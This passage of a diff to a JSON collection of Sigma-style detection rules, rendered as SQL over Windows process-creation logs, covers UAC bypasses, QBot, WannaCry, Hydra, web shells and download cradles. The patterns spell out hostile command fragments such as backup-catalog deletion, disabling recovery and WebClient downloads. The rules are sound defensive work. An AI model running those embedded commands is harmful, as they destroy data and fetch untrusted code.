Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "status": "test", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detect commandline usage of Microsoft Connection Manager 
Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE 
'%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_qbot.yml" + }, + { + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": 
"ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1564.004" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of 
DownloadFile in a single command line", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - 
"status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Very unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. 
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", + "status": "test", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + 
"filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE 
'%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Particular web applications may spawn a shell process legitimately" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE 